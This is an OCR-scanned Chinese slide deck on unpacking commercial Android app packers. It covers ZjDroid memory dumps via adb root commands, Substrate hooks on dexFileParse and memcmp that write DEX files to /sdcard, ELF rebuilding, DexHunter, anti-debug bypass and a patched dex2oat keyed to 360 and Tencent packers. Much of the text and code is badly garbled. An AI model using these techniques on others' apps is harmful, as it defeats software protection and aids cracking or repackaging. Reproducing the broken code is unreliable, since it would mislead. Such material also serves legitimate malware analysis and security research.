coredump X 4} ¥ 4€ 4 “dex.035” 
67f3 2246 
1467 d469 
3412 0000 
0000 7000 
0000 08a9 


0000 b831 
2a00 2011 
2700 697c 
2700 1d7d 





PORA 


内 存 重组 法 
Hook 法 
动态 调试 
定制 系统 
3$ AML FHL 


ak OOND 


内 存 重组 法 


Dex fa 
ZjDroid 
对 付 一 切 内 存 中 完整 的 dex， 包 括 壳 与 动态 加 载 的 jar 


C:\Wsers\Tim>adb shell 

shell@android:/ $ su 

su 

shell@android:/ # am broadcast -a com.zjdroid.invoke --ei target 14638 --es cmd 
*€action:dump_dexinfo>’ 

voke —-ei target 14638 --es cmd ’<action:dump_dexinfo>’ < 


Broadcasting: Intent < act-com.zjdroid.invoke Chas extras? >} 


Broadcast completed: result =@ 
shell@android:/ # am broadcast -a com.zjdroid.invoke —-ei target 14630 一 -es 


’€action:backsmali. "dexpath":"/data/app/org.cocos2d.fishingjoy3—1.apk‘'>’ 
n= backsmali, “dexpath":"/data/app/org.cocos2d.fishingjoy3—1.apk‘'>’ 
Broadcasting: Intent < act=com.zjdroid.invoke Chas extras) > 

Broadcast completed: result =@ 





So 篇 


常见 app 加 国 厂商 脱党 方法 


elfrebuild 


class EltRebuilder { 

private: 
const soinfo *soinfo ; 
char *shstrtab ; 
const Elf | Phdr *arm | exidx phdr ; 
Elf Phdr **load phdrs ; 
Elf " ShdrEx **rebuilded shdrs ; 
bool fromfile ; 


private: 


ElfRebuilder(const soinfo *soinfo, bool fromfile = false); 


void BuildBasicShdrs(); 
void BuildComplexShdrs( ) ; 
void BuildWholeFile(const char *target); 


void SearchGotRange(Elf Addr &start, Elf Addr &end); 
Elf Word GetAlignAndFixAddrs(Elf Addr &s vaddr, Elf Word &offset); 


public: 
virtual -ElfRebuilder(); 
void Build(const char *target) { 
BuildBasicShdrs(); 
BuildComplexShdrs(); 
BuildWholeFile(target); 


*CreateBySoinfo[const 
*CreateBySoname[ const 


ory | Annotate | Line# | Navig; 


——Ó fi 
101 pub 
102 mae nane SOINPO | NAME LEN]; 
103 const E1f32 Phdr* phdr; 

104 size t phnum; 

105 Elf32 Addr entry; 

106 Elf32 Addr base; 

107 unsigned size; 






xref: /bionic/linker/linker.h 







109 uint32 t unusedl; // DO NOT U 
Zu Elf32 Dyn* dynamic; 


113 uint32 t unused2; // DO NOT US 
114 uint32 t unused3; // DO NOT US 


116 soinfo* next; 
117 unsigned flags; 


119 const char* strtab; 


soinfo *soinfo); 
char *soname); 


420 


常见 app 加 国 厂商 脱党 方法 


. . pl /二 

构造 soinfo， 然 后 对 其 进行 重建 

ElfRebuilder *ElfRebuilder::CreateBySoinfo(const soinfo *soinfo){ 
return new BlfRebuilder(soinfo); 


} 
ElfRebuilder *ElfRebuilder::CreateBySoname(const char *soname) { 
soinfo * soinfo = (soinfo *)malloc(sizeof(soinfo) }; 
void *base = NULL; 
int fd = open(soname, O RDONLY); 
Elf Ehdr *ehdr = TYPE CAST(Elf Ehdr*, base, 0); 
_soinfo->flags = ehdr-»e flags; 
_soinfo->size = fs.st size; 
Elf Dyn *dyn = (Elf Dyn *) soinfo-»dynamic; 
for(int i-0; i«dynsiz; i++}( 
switch (dyn[i)}.d_tag){ 
case DT_SYMTAB: 
soinfo->symtab = TYPE CAST(Elf Sym*, base, dyn[ij].d un.d ptr); 
break; 
case DT HASH: 
Elf Word *hash = TYPE CAST(Elf Word *, base, dyn[i].d un.d ptr); 
.soinfo-»nbucket = hash[0]; 
 soinfo-»nchain = hash[l]; 
.soinfo-»bucket - (unsigned *)(hash * 2); 
.soinfo-»chain = (unsigned *)(hash + 2 + _soinfo->nbucket); 
break; 
) 


) 
return new ElfRebuilder( soinfo, true); 
) 


ElfRebuilder::ElfRebuilder(const soinfo *soinfo, bool fromfile): 
soinfo (soinfo), 
shstrtab (NULL), 
arm exidx phdr (NULL), 
load phdrs ((Elf Phdr **)malloc(sizeof(Elf Phdr *) * 2)), 
rebuilded shdrs ((Elf ShdrEx **)malloc(sizeof(Elf ShdrEx *) 

* MAX SECTION SIZE)), 

fromfile_(fromfile) { 


Hook 法 
针对 无 代码 抽取 且 Hook dvmDexFileOpenPartial & Jc 
Hook dexFileParse 


http://androidxref.com/4.4 r1/xref/dalvik/vm/DvmDex.cpp 


xref: /dalvik/vm/DvmDex.cpp 
Home | History | Annotate | Line# | Navigate | Download ww) only in DvmE 


145 */ 


146 int dvmDexFileOpenPartial(const voia[ addr) int{ien} DvmDex** ppDvmDex]| 
147 ( 


148 DvmDex* pDvmDex; 

149 DexFile* pDexFile; 

150 int parseFlags - kDexParseDefault; 

151 int result * -1; 

152 

153 /* -- file is incomplete, new checksum has not yet been calculated 
154 if (gDvm.verifyDexChecksum) 

155 parseFlags |= kDexParseVerifyChecksum; 

156 */ 

157 

158 pDexFile eps len, parseFlags); 
159 if (pDexFile == NULI 

160 ALOGE("DEX parse failed"); 

161 goto bail; 

asa ` 
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J.appZm Š / 向 


https://github.com/WooyunDota/DumpDex 
MSInitialize 
It 

LOGD("Cydia Init"); 

MSImageRef image; 


image = MSGetImageByName("/system/lib/libdvm.so"); 
if (image !- NULL) 


if(dexload--NULL) 


LOGD("error find _212dexFileParsePKhji"); 





void * dexload-MSFindSymbol(image," Z12dexFileParsePKhji"); 


) 
else( 
MSHookFunction(dexload, (void*) &myDexFileParse, (void **)&oldDexFileParse); 
} 
} 
else( 
LOGD("ERROR FIND LIBDVM"); 
} 
HIE ; 
DexFile* myDexFileParse(const ul * addr,size t len,int dvmdex) 
l3 
| 1 


char dexbuffer[64]={0}; 
char dexbufferNamed[128]={0}; 
char * bufferProcess-(char*)calloc(256,sizeof(char)); 


// 得 到 processname 


int processStatus= getProcessName(bufferProcess); 
LOGD("call myDexFileParse! pid: $d , pname : $s , size 


针对 无 代码 抽取 且 Hook dexFileParse X Jl 


Hook memcmp 


http://androidxref.com/4.4 r1/xref/dalvik/vm/DvmDex.cpp 


$d ",getpid(),bufferProce 


xref: /dalvik/libdex/DexFile.cpp 





Home | History | Annotate | Line# | Navigate | Download 


289 DexFile* dexFileParse(const ul* data, size t length, int flags) 
290 ( 


291 DexFile* pDexFile - NULL; 

292 const DexHeader* pHeader; 

293 const ul* magic; 

294 int result - -1; 

295 

296 if (length « sizeof(DexHeader)) ( 

297 ALOGE("too short to be a valid .dex"); 
298 goto bail; /* bad file format */ 
299 } 

300 

301 pDexFile = (DexFile*) malloc(sizeof(DexFile) ); 
302 if (pDexFile == NULL) 

303 goto bail; /* alloc failure */ 
304 memset(pDexFile, 0, sizeof(DexFile) ); 

305 

306 /* 

307 * Peel off the optimized header. 

308 */ 

310 magic = data; 


int NewMemcmp (const void *bufl, const void *buf2, unsigned int count) 
{ 

pid t pid = getpid(); 

char pPName[256] = {0}; 

get_process name by pid(pid, pPName) ; 


if (strncmp(pPName, "com.", 5) == 0) { 
LOGD ("SHOOT PackageName : $s", pPName) ; 
if (bufl != NULL && buf2 != NULL) { 
if (*(unsigned int*)bufl == 0xA786564) { 
//dex\n 
DexHeader *pHeader = (DexHeader*) buf1; 
if (pHeader->headerSize == 0x70) { 


dumpMemory(bufl, pHeader- 
>fileSize, pPName) ; 


} 
return OldMemcmp(bufl1, buf2, count); 


定制 系统 
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修改 安 草 源码 并 刷机 一 针对 无 抽取 代码 


https://github.com/bunnyblue/DexExtractor 


verbose :| fd & (ib) £ 





Le Time PID TID Application Tag Text 
, isConnectedToProvisioningNetwork: false 

I 06-23 15:15:19.62 967 967 com.gome.eshopnew MultiDex VM with version 1.6.0 does not have multidex support 

I 06-23 15:15:19.62 967 967 com.gome.eshopnew MultiDex install 

I 06-23 15:15:19.6;967 967 com.gome.eshopnew MultiDex MultiDexExtractor.load(/data/app/com.gome.eshopnew-1.apk, false) 

D 06-23 15:15:19.7: 967 1015 com.gome.eshopnew dalvikvm GC FOR ALLOC freed 375K, 16% free 2845K/3348K, paused 23ms, tota = 
1 25ms 

I 06-23 15:15:19.74 967 967  com.gome.eshopnew MultiDex loading existing secondary dex files 

I 06-23 15:15:19.771 967 967  com.gome.eshopnew MultiDex load found 1 secondary dex files 

W 06-23 15:15:19.77 967 967 com.gome.eshopnew MultiDex zip 校 验 成 功 

W 06-23 15:15:19.71967 e MultiDex bangbang 模 式 合并 DEX 

E 06-23 15:15:19.87 967 com. gome. eshopnew dalvikvm --pacthed- - 

E 06-23 15:15:19.82 967 com. gome . eshopnew dalvikvm --pacthed-- ‚$ sdcard/com. gome .eshopn 940056. dex 

E 06-23 15:15:19.8% 967 . e.eshopnew dalvikvm --pacthed-- 

E 906-23 15:15:19.82 967 Com. e.eshopnew dalvikvm Unable to delete the file 

I 06-23 15:15:19.84 390 ActivityManag Waited long enough for: ServiceRecord(b3076120 u® com.android.mu = 





sic/.MediaPlaybackService) 


E 96-23 15:15:19.9* 967 967 com.gome.eshopnew dalvikvm - -pacthed- - create file /sdcard/com.gome.eshopnew classes 394 = 
0056. dex 

E 06-23 15:15:20.5€ 967 967 com.gome.eshopnew dalvikvm --pacthed-- create file end 

I 06-23 15:15:20.5€ 967 967  com.gome.eshopnew MultiDex install done 

D 06-23 15:15:20.51 390 695 system process ConnectivityS [CheckMp] isMobileOk: not connected ni-NetworkInfo: type: mobile = 


_hipri[UMTS], state: DISCONNECTED/IDLE, reason: (unspecified), e = 





Hook dexfileParse 
DexFile* dexFileParse(const ul* data, size t length, int flags) 


11 


DexHacker mDexHacker; 





DexHacker .writeDex2Encodedijdata, (unsigned int)length); 


DexFile* pDexFile = 
const DexHeader* pHeader; 
const ul* magic; 
int result = -1; 


1 
z 
E 
& 


]void DexHacker::writeDex2Encoded(unsigned char *data, size t length)( 
#ifdef CODE DVM 
ALOGE("--pacthed-- inject .dex length $d flag=%d",length,flags) ; 
char dexbuffer[64]={0}; 
char dexbufferNamed[ 128 ]={0}; 
char bufferProcess[256]={0}; 


bufferProcess- getProcessName(bufferProcess ) ; 
sprintf(dexbuffer, "classes %d", length); 
strcat (dexbufferNamed,"/sdcard/") ; 
] if (bufferProcess!=NULL) { 
strcat(dexbufferNamed, bufferProcess ) ; 
strcat(dexbufferNamed,dexbuffer); 
] jeise( 
} 


// strcat(dexbufferNamed,dexbuffer); 

strcat (dexbufferNamed,".dex"); 

ALOGE("--pacthed-- , %s\n", dexbufferNamed) ; 

ALOGE("--pacthed-- debug dalvikParse find dex try write file "); 


DexHunter- 最 强大 的 二 代 沉 脱 壳 工具 
https://github.com/zyq8709/DexHunter 


DexHunter 的 工作 流程 : 


NO 


DexHunter 







Collected 
PEE | S code_item ~ 
Memory => juger DexClassData 
Space . Region J e 


SS 





Collected 
DexClassData 


class_def_item 


i 


classdef 





APP 启动 时 ， 通 过 freature string 定 位 dex 在 内 存 中 位 置 ， 并 读 取 classdef 抉 之 前 的 内 存 为 part1， 读 取 classdef 之 
后 的 内 存 为 data。 饥 历 class_def_ item 结构 ， 生 成 文件 classdef ,并 通过 code_item_of 朱 | 断 具 体 的 类 方法 是 否 在 
dex 范 围 内 ， 若 不 在 ， 则 写 extra 文 件 。 





DexHunter 的 工作 原理 : 










= 


| 根据 feature string， 找 到 内 存 中 的 dex 


位 置 


fi we 
beoder ee 
string. ids size 
string. ids. off 
type Ms sie 
type ids off 
proto ids size 
header proto. ids off 
field ids size 
fid ids off 
method. ids sire. 
method. id« off 
clavs defy site 
class defs. off. 

data size 
data eff 


string ids 


dass def item 






























Parti 


dass data item 











type. ids 





proto ids 


field ids 


method. ids 





classdef 
data 


将 所 有 dex 文 
件 外 的 
class_data_it 
ems 写 在 extra 

里 面 


extra 





绕 过 三 进程 反 调 试 


http://bbs.pediy.com/showthread.php?p=1439627 
1754 167292 52208 c@@59428 40011590 § com.fullgoal.android 
1789 : 764 348 pascendi c 4666d264 $ /systen/bin/sh 
2531 123088 27992 cOB93b84 48010438 $ com.yy.oa 


2542 35 139000 47486 FfFFFFFFFF 46011384 § com. android. launcher 
2586 35 154668 57944 FFFEFFFEFE 46611384 S com.fullgoal.android 
26902 128868 31764 fFfFFfFFFfFFFfFFf 46611264 § com.fullgoal.android 





get target2() ( 


res[BUF LEN] {0}? 
eite a MN ; 
SEE ial roc l/cmdline",getpid()); 
fd = open(cmd,O | RDONLY) ; 
if (read (fd, res,BUF LEN)) 
{ 
}else{ 
} 
close (fd); 
targetPath [BUF . LEN); 
sprintf (targetPath, ' | 
if ( (access (targetPath, F OK) )= 
{ 


return 1; 


fork ( 
ret; 


if (get_target2()) 


924 496 c0010008 b6f130a4 S ESTEN 
1368 1236 456 00000000 befe925c R ps 


afd@c5lc 

19608 ffffffff afdOcSlic 

114612 62780 ffffffff afdOc51c 
45904 2884 ffffffff afdOc3ac 
5356 1520 c0095230 afd0b45c 
94776 22240 ffffffff afdOc51c 





Is /proc/345/task 


# ls /proc/345/task 





Jgdbserver :1234 --attach346 ... (gdb) gcore gcore 防 Dump 解 决 方案 : 


断 点 mmap 调 试 ， 针 对 Hook dexFileParse 无 效 
原理 : dexopt 优 化 时 ，dvmContinueOptimization()->mmap() 


xref: /dalvik/vm/analysis/DexPrepare.cpp 















Home | History | Annotate | Line# | Navigate | Download smo only in DexPrep 
557 

558 { 

559 /* 

560 * Map the entire file (so we don't have to worry about page 

561 * alignment). The expectation is that the output file contains 

562 * our DEX data plus room for a small header. 

563 */ 

564 bool success; 

565 void* Add 

566 mapAddr Ffset È , PROT_READ|PROT_WRITE, 
567 d 

568 if r == MAP FAII ) 1 

569 i("unable to mmap DEX cache: $s", strerror(errno)); 

570 bail; 

571 ) 


gie 


常见 app 加 固 厂 商 脱 党 方法 


静态 脱 过 机 
分 析 沈 So 逻辑 并 还 原 加 密 算 法 


http://www.cnblogs.com/2014asm/p/4924342.html 








UWAL JuUWVTIDCifiv Vey VAIUOJIZUILIE?F VAUOLIL FUL, VALELUTVYVUL Iy VAJE JAD IJU VALUYLYUTVLEIL 
LOAD: 000094A0 DCD Ox40DB6E, OxAD11C119, Ox3FFF4CEF, Ox800BF18, 0x86200137 
LOAD: 000094A0 DCD 0xA41BCD39, Ox491EFF04, 0x456007D0, 0x591B7360, Ox2BOOFO6E 
LOAD: 000094A0 DCD OxFF16DD45, 0x3D5B20C1, 0x17BF03D, 0x656869F2, 0x111CC76C 
LOAD: 000094A0 DCD OxDOF7796F, Ox6AF3FFFF, 0x46821ACO, 0x56D4648, 0x54D1C84 
LOAD: 000094A0 DCD 0x2900FF83, 0x4642D008, 0x82DB0150, OxBF8AE11A, OxD1F80F18 
LOAD: 000094A0 DCD Ox11E000DA, 0x40132337, 0x18C9F86E, OxAB2E8DD1, 0x25F668C9 
LOAD:000094A0 DCD Ox112BD81F, OxBFB31548, 0x8018C80D, Ox46ED8100, OxC24F44A1 
LOAD: 000094A0 DCD 0xC1976082, 0x4648BFC2, 0x61184660, 0x853701DF, 0xC042E1BB 
LOAD:000094A0 DCD Ox7BBDDC, 0x43030120, 0x32F01C3, 0x656B6840, OxB7F4ADDD 
LOAD:000094A0 DCD OxE3FA24DF, 0x7F7987A0, Ox6FBO082C1, 0x18804AA7, Ox60BOOFB 
LOAD:000094A0 DCD 0x61F1303, OxF5D7D614, OxD0171CFD, 0xE7079000, 0x4B7E4B35 
LOAD:000094A0 DCD 0x17DC2302, Ox12DFA80, 0x84F7D820, Ox6A1F17FA 
[OU Se ON RED SI LL T T C 
LOAD: 00009AFO CODE16 

LOAD: 00009AFO 

LOAD: 00009AFO EXPORT JNI_OnLoad 

LOAD: 00009AFO JNI OnLoad 

LOAD: 00009AFO ADR R2, dword_9B64 

LOAD:00009AF2 LDRSB R1, [R1,RO0] 

LOAD:00009AFA4 LDR R5, [SP,#0x1CC] 

LOAD:00009AF6 LSLS R3, R5, #0x1F 

LOAD:00009AF8 LDMIA R7, {RO,R4,R6,R7} 

LOAD:00009AFA STRH R5, [R7,#0x1E] 

LOAD:00009AFC LSLS R2, R7, #3 

LOAD:00009AFE SSAT.W RO, #0x16, RO,ASR#1 

LOAD: 00009B02 ANDS R3, RO 


LOAD: 00009B04 BGE loc 9BOC 
LOAD:00009R04 : 





E x 3 linker/iso 7c 


https://github.com/devilogic/udog 
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1 见 app 加 固 厂商 脱 沉 方法 


main() -> dump_file() 
https://github.com/devilogic/udog/blob/dev/src/linker.cpp 








int main(int argc, cnarx argvl]) i 
/* 处 理 命 令 行 */ 
g_opts = handle_arguments(argc, argv); 
if (!g_opts) { 
/* 失败 */ 
usage(); 
return -1; 


/* 设 定 调试 级 别 */ 
debug verbosity = g_opts->debuglevel; 


/* 处 理 命令 行 */ 

if (g_opts->help) { 
show_help(); 
return Q; 

) else if (g opts-»version) { 
show_version(); 
return Q; 


/* 加 载 库 文件 */ 
if (g_opts->Load) { 


* 清空 全 局 信息 结构 */ 
E ES 0, sizeof(g infos)); 


/ 填充 符号 表 与 LibdL_info 结 构 */ 
fill libdl symtab(); 
fill libdl info(); 


// unsigned ret = linker init((unsigned **) (argv-1)); 
// if (ret == 0) return ret; 


charx fname = g opts-»-target file; 
soinfox lib = (soinfox)dlopen(fname, 0); 


if (lib == NULL) { 
return -1; 


//void* handle = dlsym(lib, "prepare key"); 


第 三 代 亮 


1. dex2oat 法 
2. 定制 系统 
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3，dex2oat 法 
ART 模 式 下 ，dex2oat 生 成 oat 时 ， 内 存 中 的 DEX 是 完整 的 


http://bbs.pediy.com/showthread.php?t=210532 


for (const auto& dex file : dex_files) { 
if (!dex_file->EnablewWrite()) { 
PLOG(ERROR) << "Failed to make .dex file writeable '" << dex_file->GetLocation() << "'\n"; 


} 

//http://bbs. pediy.com/showthread. php?t=210532 
std::string dex_name=dex_file->GetLocation(); 
LOG(INFO)««"dex20at::dex file name-->"<<dex_name; 





if(dex name.find("jiagu")!-std::string::npos //360 
| |dex_name.find("cache")!=std::string: :npos / (SARI, .cache HH 
| |dex_name.find("files")!=std::string: :npos /fali 


|| |dex_name.find("tx_shell")!=std::string::npos //tx 
| |dex_name.find("app_dex")!=std::string: :npos I [tx 


| |dex_name. find("nagain")!=std::string: :npos / [805m 


) 
{ 
int len = dex_file->Size(); 
char filename[150] = {0}; 
sprintf(filename,"Xs *d",dex name.c str(),len); 
int fd= open(filename,O WRONLY | O CREAT | O TRUNC, S IRWXU); 
if (fd>0) 
t 
if (write(fd,(char*)dex file--Begin(),len)«-0) 
LOG(INFO)««"dex20at::write dex file failed-->"<<filename; 
LOG(INFO)««"dex20at::write dex file success--»"««filename; 
close(fd); 
} else 
LOG(INFO)««"dex20at::open dex file failed-->"<<filename; 
P 


定制 系统 
Hook Dalvik_dalvik_system_DexFile_defineClassNative 


枚 举 所 有 DexClassDef， 对 所 有 的 class， 调 用 dvmDefineClass 进 行 强制 加 载 


ilo e pd. 





Grae oa T num_class 





{ 


ENR Z 


so + vmp 


动态 调试 十 人 内 还原 


